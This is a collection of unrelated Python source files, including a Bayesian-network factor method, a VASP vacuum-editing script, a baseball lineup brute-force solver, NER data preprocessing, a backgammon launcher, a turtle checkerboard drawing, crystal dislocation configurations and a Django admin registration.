        *vertex* is the only variable changing in the set. Then
        *vertex* is removed from the scope of the factor.
        Arguments:
            1. *vertex* -- The name of the variable to be summed out.
        Attributes modified:
            *vals*, *scope*, *stride*, *card* -- Modified to reflect the data of the summed-out product factor.
        For more information see Koller et al. 297.
        '''
        # When *value* is given, this reduces the factor to that single value
        # of *vertex* instead of summing over all of them.
        vscope = self.scope.index(vertex)
        vstride = self.stride[vertex]
        vcard = self.card[vscope]
        result = [0 for i in range(len(self.vals)//self.card[vscope])]
        # machinery that calculates values in summed out factor
        k = 0
        lcardproduct = prod(self.card[:vscope])
        for i, entry in enumerate(result):
            if value is None:
                for h in range(vcard):
                    result[i] += self.vals[k + vstride * h]
            else:
                index = self.inputbn.Vdata[vertex]['vals'].index(value)
                result[i] += self.vals[k + vstride * index]
            k += 1
            if (k % lcardproduct == 0):
                # skip over the block belonging to the removed variable
                k += (lcardproduct * (vcard - 1))
        self.vals = result
        # modify scope, card, and stride in new factor
        self.scope.remove(vertex)
        del(self.card[vscope])
        for i in range(vscope, len(self.stride)-1):
            self.stride[self.scope[i]] //= vcard
        del(self.stride[vertex])
        return self
    # alias: reducefactor doubles as the sum-out operation (value=None)
    sumout = reducefactor
    def copy(self):
        '''Return a copy of the factor.'''
        copy = type(self)(self.inputvertex, self.inputbn)
        copy.vals = self.vals[:]
        copy.stride = self.stride.copy()
        copy.scope = self.scope[:]
        copy.card = self.card[:]
        return copy
|
994,271 | bfb4a4cca5702191b61245dc837e494cbcd3e939 | ## Vacuum control program
## Built for VASP 4.6 or above format
## Built as a preliminary work as a part of MTG Materials Tool Kit.
## By Johnny Chang-Eun Kim, April. 2013
from vacuum_agent import *
from sys import argv
##where='0.5'
##howmuch='-10.0'
# Usage: python <script> <where> <howmuch>
# Loads POSCAR, calls add_vacuum(where, howmuch) — presumably the fractional
# position and vacuum thickness (TODO confirm against vacuum_agent) — and
# writes the edited structure to POSCAR_vac_edited.
target=load('POSCAR', 'vacuum_edit')
where=argv[1]
howmuch=argv[2]
target.add_vacuum(float(where), float(howmuch))
File=open('POSCAR_vac_edited', 'w'); File.write(target.buildPOSCAR()); File.close()
|
994,272 | f14682ec87a7a211ce397fcafc9206b81ba332d5 | from itertools import permutations
# Brute-force baseball lineup search (looks like BOJ 17281 — confirm):
# player 0 is fixed in the 4th batting slot; try every ordering of players
# 1..8 in the other slots, simulate n innings, keep the best total score.
n = int(input())
inning = [list(map(int, input().split())) for _ in range(n)]
answer = 0
for order in list(map(list, permutations(range(1, 9), 8))):
    # insert player 0 at batting position 3 (the 4th slot)
    order = order[:3] + [0] + order[3:]
    score = 0
    i = 0  # batting position; carries over between innings
    for k in range(n):
        out = 0
        base1, base2, base3 = 0, 0, 0  # occupancy flags for 1st/2nd/3rd base
        while out < 3:
            res = inning[k][order[i]]  # 0 = out, 1..3 = base hit, else home run
            if res == 0:
                out += 1
            elif res == 1:
                # single: 3rd-base runner scores, everyone advances one base
                score += base3
                base1, base2, base3 = 1, base1, base2
            elif res == 2:
                score += base2 + base3
                base1, base2, base3 = 0, 1, base1
            elif res == 3:
                score += base1 + base2 + base3
                base1, base2, base3 = 0, 0, 1
            else:
                # home run: all runners plus the batter score
                score += base1 + base2 + base3 + 1
                base1, base2, base3 = 0, 0, 0
            i += 1
            if i == 9:
                i = 0
    answer = max(answer, score)
print(answer)
|
994,273 | a99bbf44434be264b4d823d25392538964245ca7 | # -*- coding: UTF-8 -*-
from pysenal.io import *
from datagrand_ie_2019.utils.constant import *
from datagrand_ie_2019.data_process.entity2label import Entity2Label
def process_training_data(src_filename, dest_filename):
    """Convert the raw training file into a structured JSON dataset.

    Each source line is a space-separated sequence of segments of the form
    ``tok1_tok2_.../tag``. For every line this builds: ``tokens`` (each with
    text and character-position start/end), ``entities`` (span + type for
    every segment whose tag is not 'o'), ``labels`` (sequence labels emitted
    by Entity2Label — presumably a BIO-style scheme, confirm), and the line
    ``index``. The result list is written to *dest_filename* as JSON.
    """
    e2l = Entity2Label(resolve_conflict=False)
    data = []
    for idx, line in enumerate(read_lines_lazy(src_filename)):
        tokens = []
        entities = []
        labels = []
        index = 0  # running token offset within the sentence
        for segment in line.split(' '):
            # rsplit: only the final '/' separates tokens from the tag
            token_seq_str, tag = segment.rsplit('/', 1)
            token_seq = token_seq_str.split('_')
            seg_token_len = len(token_seq)
            seg_tokens = []
            for t_idx, token_str in enumerate(token_seq):
                start = index + t_idx
                token = {'text': token_str, 'start': start, 'end': start + 1}
                seg_tokens.append(token)
            if tag != 'o':
                entity = {'start': index, 'end': index + len(token_seq), 'type': tag}
                entities.append(entity)
                seg_labels = e2l.single({'type': tag}, index, index + len(token_seq))
            else:
                seg_labels = ['O'] * seg_token_len
            tokens.extend(seg_tokens)
            labels.extend(seg_labels)
            index += len(token_seq)
        item = {'tokens': tokens, 'entities': entities, 'labels': labels, 'index': idx}
        data.append(item)
    write_json(dest_filename, data)
def process_test_data():
    """Tokenize the raw test file (underscore-separated tokens per line)
    into TEST_FILE as JSON, recording per-token character offsets."""
    data = []
    # NOTE(review): idx is unused — the test items carry no line index.
    for idx, line in enumerate(read_lines_lazy(RAW_DATA_DIR + 'test.txt')):
        token_texts = line.split('_')
        tokens = []
        for t_idx, token in enumerate(token_texts):
            tokens.append({'text': token, 'start': t_idx, 'end': t_idx + 1})
        data.append({'tokens': tokens})
    write_json(TEST_FILE, data)
def split_data():
    """Split TRAINING_FILE 90/10 (in file order, no shuffling) into
    pre_data/training.json and pre_data/test.json."""
    data = read_json(TRAINING_FILE)
    count = len(data)
    training_count = int(count * 0.9)
    write_json(DATA_DIR + 'pre_data/training.json', data[:training_count])
    write_json(DATA_DIR + 'pre_data/test.json', data[training_count:])
def generate_nn_seq_vocab():
    """Build the token vocabulary for the neural sequence models.

    Writes one token per line to DATA_DIR + 'neural_vocab.txt': the special
    tokens (BATCH_PAD, BOS, EOS, UNK) first, followed by every distinct
    token text from TRAINING_FILE in first-seen order.
    """
    words = [BATCH_PAD, BOS, EOS, UNK]
    # Set mirror of `words` makes dedup O(1) per token; the original used
    # `text not in words` on the growing list, an O(n^2) scan over the corpus.
    # First-seen order of `words` is preserved.
    seen = set(words)
    for sent in read_json(TRAINING_FILE):
        for token in sent['tokens']:
            text = token['text']
            if text not in seen:
                seen.add(text)
                words.append(text)
    write_lines(DATA_DIR + 'neural_vocab.txt', words)
if __name__ == '__main__':
    # One-off data-prep pipeline; earlier stages stay commented out and are
    # re-enabled by hand when the raw data needs reprocessing.
    # process_training_data(RAW_DATA_DIR + 'train.txt', DATA_DIR + 'training.json')
    # split_data()
    # process_test_data()
    generate_nn_seq_vocab()
|
994,274 | a58bca03675a31f7ddb1852a1a2bc132c6a5a06d | #!/usr/bin/env python3
# Copyright (c) 2015, Bartlomiej Puget <larhard@gmail.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the Bartlomiej Puget nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL BARTLOMIEJ PUGET BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import argparse
import importlib
import logging
import sys
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--no-gui', '-n', action='store_true')
    parser.add_argument('--verbose', '-v', action='store_true')
    parser.add_argument('--white', '-w')
    parser.add_argument('--black', '-b')
    args = parser.parse_args()
    # Select the headless judge or the GUI entry point.
    if args.no_gui:
        from backgammon.judge.main import main
    else:
        from backgammon.gui.main import main
    # --white/--black name importable bot modules; replace each module-path
    # string with that module's Bot class before handing args to main().
    if args.white:
        args.white = importlib.import_module(args.white).Bot
    if args.black:
        args.black = importlib.import_module(args.black).Bot
    if args.verbose:
        logging.basicConfig(level=logging.DEBUG)
    # Forward all parsed options (no_gui, verbose, white, black) as kwargs.
    main(**vars(args))
|
994,275 | 2ad360f9d18daf4288558fa33d1108b59e41c5e2 | import turtle
from random import randint
#region draw the 8x8 checkerboard (original comment: "dessiner l'echiquier")
Circuit = turtle.Turtle()
turtle.Screen().setworldcoordinates(-20, turtle.Screen().window_height()/(-2),500,20)
Circuit.hideturtle()
Circuit.speed(100)
# outer 400x400 border
for i in range(4):
    Circuit.forward(400)
    Circuit.right(90)
# a toggles the fill colour per square; b toggles the starting colour per row
a = 0
b = 0
for i in range(8):
    if(b == 0):
        a=1
    else:
        a = 0
    for j in range(8):
        Circuit.penup()
        Circuit.goto(j * 50, i * 50 * (-1))
        Circuit.pendown()
        if(a == 0):
            Circuit.fillcolor('#33ff88')
            a=1
        else:
            Circuit.fillcolor('white')
            a=0
        Circuit.begin_fill()
        for k in range(4):
            Circuit.forward(50)
            Circuit.right(90)
        Circuit.end_fill()
    if(b==0):
        b=1
    else:
        b=0
#endregion
#region place 15 waste markers on distinct random squares
# (original comment: "Mettre en place les déchets à ramasser d'une façon aléatoire")
ListeDechets = []
compteurdechets = 0
while compteurdechets < 15:
    alea = (randint(0, 7), randint(0, 7))
    # only count a square once, guaranteeing 15 distinct positions
    if alea not in ListeDechets:
        ListeDechets.append(alea)
        compteurdechets = compteurdechets + 1
# draw each waste item as a small red triangle centred in its square
for dechet in ListeDechets:
    Circuit.penup()
    Circuit.goto((20 + (50 * dechet[0])), (-25 - (50 * dechet[1])))
    Circuit.pendown()
    Circuit.fillcolor('red')
    Circuit.begin_fill()
    for i in range(3):
        Circuit.forward(10)
        Circuit.left(120)
    Circuit.end_fill()
#endregion
turtle.exitonclick()
|
994,276 | 8b0bf16e775610481c0ad807be30cd8bd1be10c3 | '''input file'''
import math
# Each dict below describes one crystal/dislocation geometry: simulation-cell
# edge lengths, basis atoms, Burgers vector, line direction, and the rotation
# frames. All lengths are scaled by the lattice constant; hcp entries name
# which lattice constant ("a" or "c") scales each cell edge.

# BCC, screw dislocation along [111].
bcc_screw = {
    # edge length of a unit cell (scaled by lattice constant)
    "cell_x" : math.sqrt(2), #[-1,1,0]
    "cell_y" : math.sqrt(6)/3, #[1,1,2]
    "cell_z" : math.sqrt(3)/2,#[1,1,1]
    # basis atoms (relative coordinates)
    "basis_atoms" : [[0, 0, 0 ],
                     [0.5, 0.5, 1./3 ]],
    # type of each atom
    "type_basis_atoms" : [1, 1],
    # Burgers vector (scaled by lattice constant)
    "burgers" : [0.5, 0.5, 0.5],
    # dislocation line direction (unit vector)
    "disl_line_direction" : [1./math.sqrt(3.), 1./math.sqrt(3.), 1./math.sqrt(3.)],
    # initial frame: [e1, e2, e3], ei are column vectors
    "frame_initial" : [[1, 0, 0],
                       [0, 1, 0],
                       [0, 0, 1]],
    # new frame: [e1', e2', e3'], ei' are column vectors
    "frame_new" : [[ -1.0, -0.5, 1.0],
                   [ 1.0, -0.5, 1.0],
                   [ 0, 1.0, 1.0]],
    }
# BCC, cube-aligned cell (no rotation).
bcc_normal = {
    # edge length of a unit cell (scaled by lattice constant)
    "cell_x" : 1, #[1,0,0]
    "cell_y" : 1, #[0,1,0]
    "cell_z" : 1, #[0,0,1]
    # basis atoms (relative coordinates)
    "basis_atoms" : [[0, 0, 0 ],
                     [0.5, 0.5, 0.5]],
    # type of each atom
    "type_basis_atoms" : [1, 1],
    # Burgers vector (scaled by lattice constant)
    "burgers" : [0.5, 0.5, 0.5],
    # dislocation line direction (unit vector)
    "disl_line_direction" : [1./math.sqrt(3.), 1./math.sqrt(3.), 1./math.sqrt(3.)],
    # initial frame: [e1, e2, e3], ei are column vectors
    "frame_initial" : [[1, 0, 0],
                       [0, 1, 0],
                       [0, 0, 1]],
    # new frame: [e1', e2', e3'], ei' are column vectors
    "frame_new" : [[1, 0, 0],
                   [0, 1, 0],
                   [0, 0, 1]],
    }
# FCC, edge dislocation.
fcc_edge= {
    # edge length of a unit cell (scaled by lattice constant)
    "cell_x" : 0.5 * math.sqrt(2),
    "cell_y" : math.sqrt(3),
    "cell_z" : 0.5 * math.sqrt(6),
    # basis atoms (relative coordinates)
    "basis_atoms" : [[0, 0, 0 ],
                     [1./2., 0, 1./2. ],
                     [0, 2./3., 1./3. ],
                     [1./2., 2./3., 5./6. ],
                     [0, 1./3., 2./3. ],
                     [1./2., 1./3., 1./6. ]],
    # type of each atom
    "type_basis_atoms" : [1, 1, 1, 1, 1, 1],
    # Burgers vector (scaled by lattice constant)
    "burgers" : [-0.5, 0.5, 0.0],
    # dislocation line direction (unit vector)
    "disl_line_direction" : [-1./math.sqrt(6.), -1./math.sqrt(6.), 2./math.sqrt(6.)],
    # initial frame: [e1, e2, e3], ei are column vectors
    "frame_initial" : [[1, 0, 0],
                       [0, 1, 0],
                       [0, 0, 1]],
    # new frame: [e1', e2', e3'], ei' are column vectors
    "frame_new" : [[ -1.0, 1.0, -0.5],
                   [ 1.0, 1.0, -0.5],
                   [ 0, 1.0, 1.0]],
    }
# FCC, screw dislocation.
fcc_screw = {
    # edge length of a unit cell (scaled by lattice constant)
    "cell_x" : 0.5 * math.sqrt(6),
    "cell_y" : math.sqrt(3),
    "cell_z" : 0.5 * math.sqrt(2),
    # basis atoms (relative coordinates)
    "basis_atoms" : [[0, 0, 0 ],
                     [1./2., 0, 1./2. ],
                     [2./3., 2./3., 0 ],
                     [1./6., 2./3., 1./2. ],
                     [1./3., 1./3., 0 ],
                     [5./6., 1./3., 1./2. ]],
    # type of each atom
    "type_basis_atoms" : [1, 1, 1, 1, 1, 1],
    # Burgers vector (scaled by lattice constant)
    "burgers" : [-0.5, 0.5, 0.0],
    # dislocation line direction (unit vector)
    "disl_line_direction" : [-1./math.sqrt(2.), 1./math.sqrt(2.), 0.],
    # initial frame: [e1, e2, e3], ei are column vectors
    "frame_initial" : [[1, 0, 0],
                       [0, 1, 0],
                       [0, 0, 1]],
    # new frame: [e1', e2', e3'], ei' are column vectors
    "frame_new" : [[ 0.5, 1.0, 1.0],
                   [ 0.5, 1.0, -1.0],
                   [-1.0, 1.0, 0.0]],
    }
# FCC, mixed dislocation.
fcc_mix = {
    # edge length of a unit cell (scaled by lattice constant)
    "cell_x" : 0.5 * math.sqrt(2),
    "cell_y" : math.sqrt(3),
    "cell_z" : 0.5 * math.sqrt(6),
    # basis atoms (relative coordinates)
    "basis_atoms" : [[0, 0, 0 ],
                     [1./2., 0, 1./2. ],
                     [0, 2./3., 1./3. ],
                     [1./2., 2./3., 5./6. ],
                     [0, 1./3., 2./3. ],
                     [1./2., 1./3., 1./6. ]],
    # type of each atom
    "type_basis_atoms" : [1, 1, 1, 1, 1, 1],
    # Burgers vector (scaled by lattice constant)
    "burgers" : [-0.5, 0., 0.5],
    # dislocation line direction (unit vector)
    "disl_line_direction" : [1./math.sqrt(6.), 1./math.sqrt(6.), -2./math.sqrt(6.)],
    # initial frame: [e1, e2, e3], ei are column vectors
    "frame_initial" : [[1, 0, 0],
                       [0, 1, 0],
                       [0, 0, 1]],
    # new frame: [e1', e2', e3'], ei' are column vectors
    "frame_new" : [[ 1, 1.0, -0.5],
                   [ -1, 1.0, -0.5],
                   [ 0, 1.0, 1.0]],
    }
# hcp b_vector is at the new frame coordinate
# HCP, <a> screw dislocation on the basal plane.
hcp_screw_a_basal = {
    # edge length of a unit cell (scaled by lattice constant)
    "cell_x" : math.sqrt(3),
    "cell_y" : 1,
    "cell_z" : 1,
    "cell_x_latt_const" : "a",
    "cell_y_latt_const" : "c",
    "cell_z_latt_const" : "a",
    # basis atoms (relative coordinates)
    "basis_atoms" : [[0, 0, 0 ],
                     [1./2., 0, 1./2 ],
                     [1./3, 1./2, 0. ],
                     [5./6, 1./2, 1./2 ]],
    # type of each atom
    "type_basis_atoms" : [1, 1, 1, 1,],
    # Burgers vector (scaled by lattice constant)
    "burgers" : [0, 0, 1],
    # dislocation line direction (unit vector)
    "disl_line_direction" : [0., 0, 1],
    # initial frame: [e1, e2, e3], ei are column vectors
    "frame_initial" : [[1, 0, 0],
                       [0, 1, 0],
                       [0, 0, 1]],
    # new frame: [e1', e2', e3'], ei' are column vectors
    "frame_new" : [[ 1, 0, 0 ],
                   [ 0, 0, -1 ],
                   [ 0, 1, 0 ]],
    }
# HCP, <a> edge dislocation on the basal plane.
hcp_edge_a_basal = {
    # edge length of a unit cell (scaled by lattice constant)
    "cell_x" : 1,
    "cell_y" : 1,
    "cell_z" : math.sqrt(3),
    "cell_x_latt_const" : "a",
    "cell_y_latt_const" : "c",
    "cell_z_latt_const" : "a",
    # basis atoms (relative coordinates)
    "basis_atoms" : [[0, 0, 0 ],
                     [1./2., 0, 1./2 ],
                     [0, 1./2, 2./3 ],
                     [1./2, 1./2, 1./6 ]],
    # type of each atom
    "type_basis_atoms" : [1, 1, 1, 1,],
    # Burgers vector (scaled by lattice constant)
    "burgers" : [1, 0, 0],
    # dislocation line direction (unit vector)
    "disl_line_direction" : [0, 0, 1],
    # initial frame: [e1, e2, e3], ei are column vectors
    "frame_initial" : [[1, 0, 0],
                       [0, 1, 0],
                       [0, 0, 1]],
    # new frame: [e1', e2', e3'], ei' are column vectors
    "frame_new" : [[ 1, 0, 0 ],
                   [ 0, 0, -1 ],
                   [ 0, 1, 0 ]],
    }
# HCP, <a> screw dislocation on the first-order prism plane.
hcp_screw_a_prismI = {
    # edge length of a unit cell (scaled by lattice constant)
    "cell_x" : 1,
    "cell_y" : math.sqrt(3),
    "cell_z" : 1,
    "cell_x_latt_const" : "c",
    "cell_y_latt_const" : "a",
    "cell_z_latt_const" : "a",
    # basis atoms (relative coordinates)
    "basis_atoms" : [[0, 0, 0 ],
                     [0, 1./2, 1./2 ],
                     [1./2, 1./3, 0 ],
                     [1./2, 5./6, 1./2 ]],
    # type of each atom
    "type_basis_atoms" : [1, 1, 1, 1,],
    # Burgers vector (scaled by lattice constant)
    "burgers" : [0, 0, 1],
    # dislocation line direction (unit vector)
    "disl_line_direction" : [0, 0, 1],
    # initial frame: [e1, e2, e3], ei are column vectors
    "frame_initial" : [[1, 0, 0],
                       [0, 1, 0],
                       [0, 0, 1]],
    # new frame: [e1', e2', e3'], ei' are column vectors
    "frame_new" : [[ 0, 0, -1 ],
                   [ 0, 1, 0 ],
                   [ 1, 0, 0 ]],
    }
# HCP, <a> edge dislocation on the first-order prism plane.
hcp_edge_a_prismI = {
    # edge length of a unit cell (scaled by lattice constant)
    "cell_x" : 1,
    "cell_y" : 1,
    "cell_z" : math.sqrt(3),
    "cell_x_latt_const" : "a",
    "cell_y_latt_const" : "c",
    "cell_z_latt_const" : "a",
    # basis atoms (relative coordinates)
    "basis_atoms" : [[0, 0, 0 ],
                     [1./2, 0, 1./2 ],
                     [0, 1./2, 1./3 ],
                     [1./2, 1./2, 5./6 ]],
    # type of each atom
    "type_basis_atoms" : [1, 1, 1, 1,],
    # Burgers vector (scaled by lattice constant)
    "burgers" : [1, 0, 0],
    # dislocation line direction (unit vector)
    "disl_line_direction" : [1, 0, 0],
    # initial frame: [e1, e2, e3], ei are column vectors
    "frame_initial" : [[1, 0, 0],
                       [0, 1, 0],
                       [0, 0, 1]],
    # new frame: [e1', e2', e3'], ei' are column vectors
    "frame_new" : [[ 1, 0, 0 ],
                   [ 0, 0, -1 ],
                   [ 0, 1, 0 ]],
    }
# HCP, <a> edge dislocation on the first-order pyramidal plane.
hcp_edge_a_pyrI = {
    # edge length of a unit cell (scaled by lattice constant)
    "cell_x" : 1,
    "cell_y" : 2,
    "cell_z" : math.sqrt(3),
    "cell_x_latt_const" : "a",
    "cell_y_latt_const" : "c",
    "cell_z_latt_const" : "a",
    # basis atoms (relative coordinates)
    "basis_atoms" : [[1., -1., 1 ],
                     [1./2, -1., 3./2 ],
                     [1., -3./4, 4./3 ],
                     [1./2, -3./4, 11./6 ],
                     [1., -1./2, 1. ],
                     [1./2, -1./2, 1./2 ],
                     [1./2, -1./4, 5./6 ],
                     [1., -1./4, 1./3 ]],
    # type of each atom
    "type_basis_atoms" : [1, 1, 1, 1, 1, 1, 1, 1],
    # Burgers vector (scaled by lattice constant)
    "burgers" : [1, 0, 0],
    # dislocation line direction (unit vector)
    "disl_line_direction" : [0, 0, 1],
    # initial frame: [e1, e2, e3], ei are column vectors
    "frame_initial" : [[1, 0, 0],
                       [0, 1, 0],
                       [0, 0, 1]],
    "frame_new" : [[1, 0, 0],
                   [0, 0, -1],
                   [0, 1, 0]],
    }
# HCP, <c+a> screw dislocation on the second-order pyramidal plane.
hcp_screw_ca_pyrII = {
    # edge length of a unit cell (scaled by lattice constant)
    "cell_x" : math.sqrt(3),
    "cell_y" : 1,
    "cell_z" : 1,
    "cell_x_latt_const" : "a",
    "cell_y_latt_const" : "c",
    "cell_z_latt_const" : "a",
    # basis atoms (relative coordinates)
    "basis_atoms" : [[0, -1, 1 ],
                     [1./2, -1, 3./2 ],
                     [1./3, -1./2, 0 ],
                     [5./6, -1./2, 1./2 ]],
    # type of each atom
    "type_basis_atoms" : [1, 1, 1, 1],
    # Burgers vector (scaled by lattice constant)
    "burgers" : [0, 0, 1],
    # dislocation line direction (unit vector)
    "disl_line_direction" : [0, 0, 1],
    # initial frame: [e1, e2, e3], ei are column vectors
    "frame_initial" : [[1, 0, 0],
                       [0, 1, 0],
                       [0, 0, 1]],
    "frame_new" : [[1, 0, 0],
                   [0, 0, -1],
                   [0, 1, 0]],
    }
# HCP, <c+a> screw dislocation on the first-order pyramidal plane.
hcp_screw_ca_pyrI = {
    # edge length of a unit cell (scaled by lattice constant)
    "cell_x" : math.sqrt(3)/2,
    "cell_y" : 1,
    "cell_z" : 1,
    "cell_x_latt_const" : "a",
    "cell_y_latt_const" : "c",
    "cell_z_latt_const" : "a",
    # basis atoms (relative coordinates)
    "basis_atoms" : [[0, 0, 0 ],
                     [1./3, 1./2, 1./2 ]],
    # type of each atom
    "type_basis_atoms" : [1, 1,],
    # Burgers vector (scaled by lattice constant)
    "burgers" : [0, 0, 1],
    # dislocation line direction (unit vector)
    "disl_line_direction" : [0, 0, 1],
    # initial frame: [e1, e2, e3], ei are column vectors
    "frame_initial" : [[1, 0, 0],
                       [0, 1, 0],
                       [0, 0, 1]],
    "frame_new" : [[1, 0, 0],
                   [0, 0, -1],
                   [0, 1, 0]],
    }
# HCP, <c+a> edge dislocation on the second-order pyramidal plane.
hcp_edge_ca_pyrII = {
    # edge length of a unit cell (scaled by lattice constant)
    "cell_x" : 1,
    "cell_y" : 1,
    "cell_z" : math.sqrt(3),
    "cell_x_latt_const" : "a",
    "cell_y_latt_const" : "c",
    "cell_z_latt_const" : "a",
    # basis atoms (relative coordinates)
    "basis_atoms" : [[0, 0, 0 ],
                     [-1./2, 0, 1./2 ],
                     [ 0 , 1./2, 1./3 ],
                     [ 1./2 , 1./2, 5./6 ]],
    # type of each atom
    "type_basis_atoms" : [1, 1, 1, 1],
    # Burgers vector (scaled by lattice constant)
    "burgers" : [1, 0, 0],
    # dislocation line direction (unit vector)
    "disl_line_direction" : [0, 0, 1],
    # initial frame: [e1, e2, e3], ei are column vectors
    "frame_initial" : [[1, 0, 0],
                       [0, 1, 0],
                       [0, 0, 1]],
    "frame_new" : [[1, 0, 0],
                   [0, 0, -1],
                   [0, 1, 0]],
    }
# HCP, mixed <c+a> dislocation on the first-order prism plane.
hcp_mixed_ca_prismI = { #NO PBC
    # edge length of a unit cell (scaled by lattice constant)
    "cell_x" : 1,
    "cell_y" : math.sqrt(3),
    "cell_z" : 1,
    "cell_x_latt_const" : "a",
    "cell_y_latt_const" : "a",
    "cell_z_latt_const" : "c",
    # basis atoms (relative coordinates)
    "basis_atoms" : [[0, 0, 0 ],
                     [-1./2, 1./2, 0 ],
                     [ 1./2 , 1./6, 1./2 ],
                     [ 0 , 2./3, 1./2 ],],
    # type of each atom
    "type_basis_atoms" : [1, 1, 1, 1,],
    # Burgers vector (scaled by lattice constant)
    "burgers" : [1, 0, 1],
    # dislocation line direction (unit vector)
    "disl_line_direction" : [0, 0, 1],
    # initial frame: [e1, e2, e3], ei are column vectors
    "frame_initial" : [[1, 0, 0],
                       [0, 1, 0],
                       [0, 0, 1]],
    "frame_new" : [[1, 0, 0],
                   [0, 1, 0],
                   [0, 0, 1]],
    } # NOTE: periodic boundary conditions cannot be used with this geometry
# HCP, mixed <c+a> dislocation on the first-order pyramidal plane.
hcp_mixed_ca_pyrI = { #NO PBC
    # edge length of a unit cell (scaled by lattice constant)
    "cell_x" : math.sqrt(3),
    "cell_y" : 2,
    "cell_z" : 1,
    "cell_x_latt_const" : "a",
    "cell_y_latt_const" : "c",
    "cell_z_latt_const" : "a",
    # basis atoms (relative coordinates)
    "basis_atoms" : [[0, 0, 0 ],
                     [ 1./2, 0, 1./2 ],
                     [ 1./3 , 1./4, 0 ],
                     [ 5./6 , 1./4, 1./2 ],
                     [ -1./2, 1./2, 1./2 ],
                     [-1./6, 3./4, 1./2 ],
                     [-2./3, 3./4, 0 ],
                     [0, 1./2, 0]],
    # type of each atom
    "type_basis_atoms" : [1, 1, 1, 1, 1, 1, 1, 1, ],
    # Burgers vector (scaled by lattice constant)
    "burgers" : [1./2, 0, 1./2],
    # dislocation line direction (unit vector)
    "disl_line_direction" : [0, 0, 1],
    # initial frame: [e1, e2, e3], ei are column vectors
    "frame_initial" : [[1, 0, 0],
                       [0, 1, 0],
                       [0, 0, 1]],
    "frame_new" : [[1, 0, 0],
                   [0, 0, -1],
                   [0, 1, 0]],
    }
# HCP, <c> screw dislocation on the first-order prism plane.
hcp_screw_c_prismI = {
    # edge length of a unit cell (scaled by lattice constant)
    "cell_x" : 1,
    "cell_y" : math.sqrt(3),
    "cell_z" : 1,
    "cell_x_latt_const" : "a",
    "cell_y_latt_const" : "a",
    "cell_z_latt_const" : "c",
    # basis atoms (relative coordinates)
    "basis_atoms" : [[0, 0, 0 ],
                     [1./2, 1./2, 0 ],
                     [1./2, 1./6, 1./2 ],
                     [1., 2./3, 1./2 ]],
    # type of each atom
    "type_basis_atoms" : [1, 1, 1, 1],
    # Burgers vector (scaled by lattice constant)
    "burgers" : [0, 0, 1],
    # dislocation line direction (unit vector)
    "disl_line_direction" : [0, 0, 1],
    # initial frame: [e1, e2, e3], ei are column vectors
    "frame_initial" : [[1, 0, 0],
                       [0, 1, 0],
                       [0, 0, 1]],
    "frame_new" : [[1, 0, 0],
                   [0, 1, 0],
                   [0, 0, 1]],
    }
# HCP, <c> edge dislocation on the first-order prism plane.
hcp_edge_c_prismI = {
    # edge length of a unit cell (scaled by lattice constant)
    "cell_x" : 1,
    "cell_y" : math.sqrt(3),
    "cell_z" : 1,
    "cell_x_latt_const" : "c",
    "cell_y_latt_const" : "a",
    "cell_z_latt_const" : "a",
    # basis atoms (relative coordinates)
    "basis_atoms" : [[0, 0, 0 ],
                     [0, 1./2, 1./2 ],
                     [1./2, 5./6, 1./2 ],
                     [1./2, 1./3, 1. ]],
    # type of each atom
    "type_basis_atoms" : [1, 1, 1, 1],
    # Burgers vector (scaled by lattice constant)
    "burgers" : [1, 0, 0],
    # dislocation line direction (unit vector)
    "disl_line_direction" : [0, 0, 1],
    # initial frame: [e1, e2, e3], ei are column vectors
    "frame_initial" : [[1, 0, 0],
                       [0, 1, 0],
                       [0, 0, 1]],
    "frame_new" : [[0, 0, -1],
                   [0, 1, 0],
                   [1, 0, 0]],
    }
# HCP, <c> edge dislocation on the second-order prism plane.
hcp_edge_c_prismII = {
    # edge length of a unit cell (scaled by lattice constant)
    "cell_x" : 1,
    "cell_y" : 1,
    "cell_z" : math.sqrt(3),
    "cell_x_latt_const" : "c",
    "cell_y_latt_const" : "a",
    "cell_z_latt_const" : "a",
    # basis atoms (relative coordinates)
    "basis_atoms" : [[0, 0, 0 ],
                     [0, 1./2, 1./2 ],
                     [1./2, 1./2, 5./6 ],
                     [1./2, 1. , 1./3]],
    # type of each atom
    "type_basis_atoms" : [1, 1, 1, 1],
    # Burgers vector (scaled by lattice constant)
    "burgers" : [1, 0, 0],
    # dislocation line direction (unit vector)
    "disl_line_direction" : [0, 0, 1],
    # initial frame: [e1, e2, e3], ei are column vectors
    "frame_initial" : [[1, 0, 0],
                       [0, 1, 0],
                       [0, 0, 1]],
    "frame_new" : [[0, 0, -1],
                   [0, 1, 0],
                   [1, 0, 0]],
    }
|
994,277 | 1b7758bdfa66c3e4ea54060330f342e2446e88bc | from django.contrib import admin
from django_vcs.models import CodeRepository
class CodeRepositoryAdmin(admin.ModelAdmin):
    """Admin options for CodeRepository: the slug field auto-fills from name."""
    prepopulated_fields = {
        'slug': ('name',)
    }
admin.site.register(CodeRepository, CodeRepositoryAdmin)
|
994,278 | 14d127424b2e593bfa7ae7a5f9da2877239c72e2 | # Grid codes
from . import Q2012034_L3m_DAY_EVSCI_V1_2DR_SSS_1deg
